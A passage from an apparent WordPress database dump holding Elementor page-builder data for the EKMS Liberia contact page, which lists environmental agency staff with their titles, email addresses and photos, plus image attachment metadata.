href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23249,3371,'_wp_attached_file','2021/01/jallah.png'),(23250,3371,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2021/01/jallah.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"jallah-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"jallah-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23251,3372,'_elementor_edit_mode','builder'),(23252,3372,'_elementor_template_type','wp-page'),(23253,3372,'_elementor_version','3.0.16'),(23254,3372,'_wp_page_template','default'),(23255,3372,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\